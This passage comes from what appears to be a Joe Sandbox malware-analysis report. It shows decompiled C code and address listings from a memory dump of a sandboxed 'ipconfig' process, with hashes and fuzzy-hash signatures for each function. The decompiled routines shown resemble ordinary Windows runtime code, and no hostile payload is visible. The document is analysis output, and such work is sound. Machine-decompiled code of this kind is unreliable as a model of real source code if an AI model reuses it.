						_t73 =  *0x2f88628; // 0x0
						_t105 = _v28;
						_t80 =  *0x2f8862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x2f5fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































              0x02ebdbe9
              0x02ebdbf2
              0x02ebdbf7
              0x02ebdbf9
              0x02ebdbfc
              0x02ebdc00
              0x02ebdc03
              0x02ebdc14
              0x02ebdd54
              0x02ebdd54
              0x02ebdd54
              0x02ebdc18
              0x02ebdc1d
              0x02ebdc1d
              0x02ebdc32
              0x02ebdc3b
              0x02ebdc3e
              0x02ebdc46
              0x02ebdd5b
              0x02ebdd62
              0x02ebdd64
              0x02ebdd67
              0x02ebdd69
              0x02ebdd6b
              0x02ebdd6e
              0x02ebdd70
              0x02ebdd73
              0x02ebdd73
              0x00000000
              0x02ebdc4c
              0x02ebdc4e
              0x02f03ae3
              0x02f03ae8
              0x02f03aea
              0x02ebdce7
              0x02ebdce9
              0x02ebdcec
              0x02ebdcee
              0x02ebdcf0
              0x02ebdcf3
              0x02ebdcf5
              0x02f03af2
              0x02f03af5
              0x02f03af5
              0x02ebdd06
              0x02ebdd08
              0x02ebdd0b
              0x02ebdd12
              0x02f03b08
              0x02ebdd18
              0x02ebdd18
              0x02ebdd18
              0x02ebdd20
              0x02ebdd23
              0x02f03b16
              0x02f03b16
              0x02ebdd29
              0x02ebdd2d
              0x02ebdd36
              0x02ebdd40
              0x02ebdd51
              0x02ebdd51
              0x02ebdc54
              0x02ebdc59
              0x02ebdc59
              0x02ebdc5e
              0x02ebdc5e
              0x02ebdc63
              0x02ebdc66
              0x02ebdc6b
              0x02ebdc78
              0x02ebdc7b
              0x02ebdc81
              0x02ebdc81
              0x02ebdc83
              0x02ebdc89
              0x00000000
              0x00000000
              0x02ebdd7b
              0x02ebdd7b
              0x02ebdc8f
              0x02ebdc8f
              0x02ebdc92
              0x02ebdc99
              0x02ebdc9f
              0x02ebdca5
              0x02ebdcaa
              0x02ebdcaa
              0x02ebdcb3
              0x02ebdcb8
              0x02ebdcbb
              0x02ebdcc1
              0x02ebdccf
              0x02ebdcd2
              0x02ebdcd5
              0x02ebdcd7
              0x02ebdcda
              0x02ebdcdc
              0x02ebdcdc
              0x02ebdce2
              0x02ebdce4
              0x00000000
              0x02ebdce4

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0783c6e2a3ff1dafaf5653e58cd957f2dae1cc53159c3fb2c5452ea37da65446
              • Instruction ID: fbe62848ac044fa7f0f8063db172af5c13faa672786679ea8fc3dbaa97b800c3
              • Opcode Fuzzy Hash: 0783c6e2a3ff1dafaf5653e58cd957f2dae1cc53159c3fb2c5452ea37da65446
              • Instruction Fuzzy Hash: 35518D75A40609CFCB15CFA8C890AEEFBF2BF4A354F20965AD595A7340DB31A944CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EAEF40 Relevance: .1, Instructions: 147COMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E02EAEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E02E99080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x779cc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E02E92D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























              0x02eaef4b
              0x02eaef4d
              0x02eaef57
              0x02eaf0bd
              0x02eaf0c2
              0x02eaf0d2
              0x02eaf0d2
              0x02eaf0c2
              0x02eaef5d
              0x02eaef5f
              0x02eaef67
              0x02eaef6a
              0x02eaef6d
              0x02eaef74
              0x02eaef7f
              0x02eaef82
              0x02eaef82
              0x02eaef86
              0x02eaef88
              0x02eaef8c
              0x02eaef8f
              0x02eaef8f
              0x02eaef8f
              0x00000000
              0x02eaef91
              0x02eaef93
              0x02eaefc4
              0x02eaefc4
              0x02eaefc4
              0x02eaefca
              0x02eaefd0
              0x02eaf0a6
              0x00000000
              0x00000000
              0x02eaf0af
              0x02efbb06
              0x02efbb0a
              0x02eaf0b5
              0x02eaf0b5
              0x02eaf0b5
              0x02eaf0b5
              0x00000000
              0x02eaefd6
              0x02eaefd9
              0x02eaf0de
              0x02eaf0e2
              0x02eaefdf
              0x02eaefdf
              0x02eaefdf
              0x02eaefe5
              0x02efbafc
              0x02efbafc
              0x02eaefe5
              0x02eaefeb
              0x02eaefed
              0x02eaf00f
              0x02eaf011
              0x02eaf01a
              0x02eaf01d
              0x02eaf021
              0x02eaf028
              0x02eaf029
              0x02eaf029
              0x02eaf02c
              0x00000000
              0x02eaf02c
              0x02eaeff3
              0x02eaeff9
              0x02eaf0ea
              0x02eaf0ed
              0x02eaf0ef
              0x00000000
              0x02eaf0ef
              0x02eaf003
              0x02efbb12
              0x02eaf045
              0x02eaf049
              0x02eaf051
              0x02eaf09e
              0x02eaf0a0
              0x02eaf0a0
              0x02eaf09e
              0x02eaf053
              0x02eaf064
              0x02eaf064
              0x02eaf06b
              0x02efbb1a
              0x02efbb1a
              0x02eaf071
              0x02eaf071
              0x02eaf07d
              0x02eaf082
              0x02eaf08f
              0x02eaf08f
              0x02eaf009
              0x02eaf00d
              0x00000000
              0x02eaf00d
              0x02eaefd0
              0x02eaef97
              0x02eaefa5
              0x02eaefaa
              0x00000000
              0x02eaefac
              0x02eaefac
              0x02eaefac
              0x00000000
              0x02eaefb2
              0x02eaf036
              0x02eaf03a
              0x02eaf040
              0x02eaf090
              0x00000000
              0x02eaf092
              0x02eaf042
              0x00000000
              0x02eaf042
              0x02eaefb7
              0x02eaefb9
              0x02eaefbc
              0x02eaefb0
              0x02eaefb0
              0x00000000
              0x02eaefbe
              0x02eaefbe
              0x02eaefc1
              0x00000000
              0x02eaefc1
              0x02eaefbc
              0x02eaefaa
              0x02eaef91

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
              • Instruction ID: 198ad5c5431f7ccc1cbfddb46ee0d918c64c99134c7eb498bd6ee90963cfacb1
              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
              • Instruction Fuzzy Hash: 06510030E842499FDB20CB69C0E17EEBBB1EF1530CF18E1A8D5459B681C376B988C791
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F6740D Relevance: .1, Instructions: 141COMMON
              Download Yara Rule
              C-Code - Quality: 84%
              			E02F6740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E02EED4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E02EDF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L02EB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L02EB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E02EDF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L02EB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















              0x02f6740d
              0x02f6740d
              0x02f67412
              0x02f67413
              0x02f67416
              0x02f67418
              0x02f6741c
              0x02f6741f
              0x02f67422
              0x02f67422
              0x02f67428
              0x02f6742a
              0x02f6742a
              0x02f67451
              0x02f67432
              0x02f6744f
              0x02f6744f
              0x00000000
              0x02f67434
              0x02f67438
              0x02f67443
              0x02f67517
              0x02f67517
              0x02f6751a
              0x02f67535
              0x02f67520
              0x02f67527
              0x02f6752c
              0x02f67531
              0x02f67533
              0x00000000
              0x02f67533
              0x00000000
              0x02f67531
              0x02f6754b
              0x02f6754f
              0x02f6755c
              0x02f6755c
              0x02f6755f
              0x02f67560
              0x02f67561
              0x02f67562
              0x02f67563
              0x02f67568
              0x02f6756a
              0x02f6756c
              0x02f6756d
              0x02f6756d
              0x02f6756f
              0x02f67572
              0x02f67574
              0x02f67577
              0x02f6757c
              0x02f6757f
              0x00000000
              0x02f67551
              0x02f67551
              0x02f67551
              0x02f67553
              0x02f67553
              0x02f67449
              0x02f67449
              0x02f6744c
              0x02f6744c
              0x00000000
              0x02f6744c
              0x02f67443
              0x02f6750e
              0x02f67514
              0x02f67514
              0x02f67455
              0x02f67469
              0x02f6746d
              0x00000000
              0x02f67473
              0x02f67473
              0x02f67476
              0x02f67480
              0x02f67484
              0x02f6748e
              0x02f67493
              0x02f67493
              0x02f67496
              0x02f67499
              0x02f674a1
              0x02f674b1
              0x02f674b5
              0x00000000
              0x02f674bb
              0x02f674c1
              0x02f674c1
              0x02f674c4
              0x02f674c5
              0x02f674c6
              0x02f674c7
              0x02f674c8
              0x02f674cd
              0x00000000
              0x02f674d3
              0x02f674d3
              0x02f674d6
              0x02f674d8
              0x02f674db
              0x02f674dd
              0x02f674e0
              0x02f674e7
              0x02f674ee
              0x02f674ee
              0x02f674f4
              0x02f674f9
              0x00000000
              0x02f674fb
              0x02f674fb
              0x02f674fd
              0x02f67500
              0x02f67503
              0x02f67505
              0x02f67505
              0x02f674f9
              0x00000000
              0x02f674cd
              0x02f674b5
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
              • Instruction ID: 86852d012fdade59db63bf02c4d59e4de124b92e5350ec82cbd43ea1f92c97f6
              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
              • Instruction Fuzzy Hash: DF51C071A00606EFDB15DF14C584AA6FBB5FF44348F14C1AAE9089F216E371E946CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC2990 Relevance: .1, Instructions: 133COMMON
              Download Yara Rule
              C-Code - Quality: 97%
              			E02EC2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x2f6ff00);
				E02EED08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2e71664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E02EDE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2e71668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E02F151BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2e7166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E02EC2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E02EA6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E02EC2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E02EC2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E02EC2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E02EC2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E02EED0D1(_t62);
				goto L28;
			}





















              0x02ec2990
              0x02ec2992
              0x02ec2997
              0x02ec29a3
              0x02ec29a6
              0x02ec29ab
              0x02ec29ad
              0x02ec29b2
              0x02f05c80
              0x02ec29b8
              0x02ec29b8
              0x02ec29bb
              0x02ec29c0
              0x02ec29c5
              0x02ec29c6
              0x02ec29c6
              0x02ec29cb
              0x00000000
              0x00000000
              0x02ec29cd
              0x02ec29d0
              0x02ec29d9
              0x02ec29db
              0x02ec29dd
              0x02ec2a7f
              0x02ec2a84
              0x02ec2a87
              0x02ec2a89
              0x02f05ca1
              0x02f05ca3
              0x00000000
              0x02ec2a8f
              0x02ec2a8f
              0x00000000
              0x02ec2a8f
              0x00000000
              0x02ec29e3
              0x02ec29e3
              0x02ec29e3
              0x00000000
              0x02ec29e3
              0x02ec29dd
              0x00000000
              0x02ec29db
              0x02ec29e6
              0x02ec29e9
              0x02ec29eb
              0x02ec29ed
              0x02ec29f3
              0x02ec29f5
              0x02ec29f8
              0x02ec29fa
              0x02ec2a97
              0x02ec2a9a
              0x02ec2a9d
              0x02ec2add
              0x00000000
              0x02ec2a9f
              0x02ec2aa2
              0x02ec2aa5
              0x02ec2aa8
              0x02ec2aab
              0x02f05cab
              0x02f05caf
              0x02f05cc5
              0x02f05cda
              0x02f05cdc
              0x02f05cdf
              0x02f05ce5
              0x00000000
              0x02f05ceb
              0x02f05ced
              0x02f05cee
              0x00000000
              0x02f05cee
              0x02f05cb1
              0x02f05cb4
              0x02f05cb9
              0x02f05cbb
              0x00000000
              0x02f05cbd
              0x02f05cbd
              0x00000000
              0x02f05cbd
              0x02f05cbb
              0x02ec2ab1
              0x02ec2ab1
              0x02ec2ac4
              0x02ec2ac6
              0x02ec2ac6
              0x00000000
              0x02ec2ac6
              0x02ec2aab
              0x00000000
              0x02ec2a00
              0x02ec2a09
              0x02ec2a0e
              0x02ec2a21
              0x02ec2a24
              0x02ec2a35
              0x02ec2a3a
              0x02ec2a3d
              0x02ec2a42
              0x02ec2a59
              0x02ec2a59
              0x02ec2a5c
              0x02ec2a5f
              0x02ec2a5f
              0x02ec29fa
              0x02ec29f3
              0x02ec2a64
              0x02ec2a64
              0x02ec2a6b
              0x02ec2a6b
              0x02ec2a6d
              0x02ec2a72
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bd6c2ac257e91e943f8871bd15f2b8e43f4b68af1fe833c123bda8612aed8df1
              • Instruction ID: 1c0215c50d6d47c7b5f9993bea174a9e36d243c5073d186e4a1ee25266234c22
              • Opcode Fuzzy Hash: bd6c2ac257e91e943f8871bd15f2b8e43f4b68af1fe833c123bda8612aed8df1
              • Instruction Fuzzy Hash: 7B515471A402099FDF25CF94CA80ADEBBB6BB48354F25D019EE05AB260C3719952CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC4BAD Relevance: .1, Instructions: 131COMMON
              Download Yara Rule
              C-Code - Quality: 85%
              			E02EC4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x2f8d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E02E9CC50(_t86);
					L11:
					return E02EDB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x2f88504
				E02EB2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E02EDFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E02EDB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L02EB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E02E9CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x2f88504
								E02EAFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E02EC4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
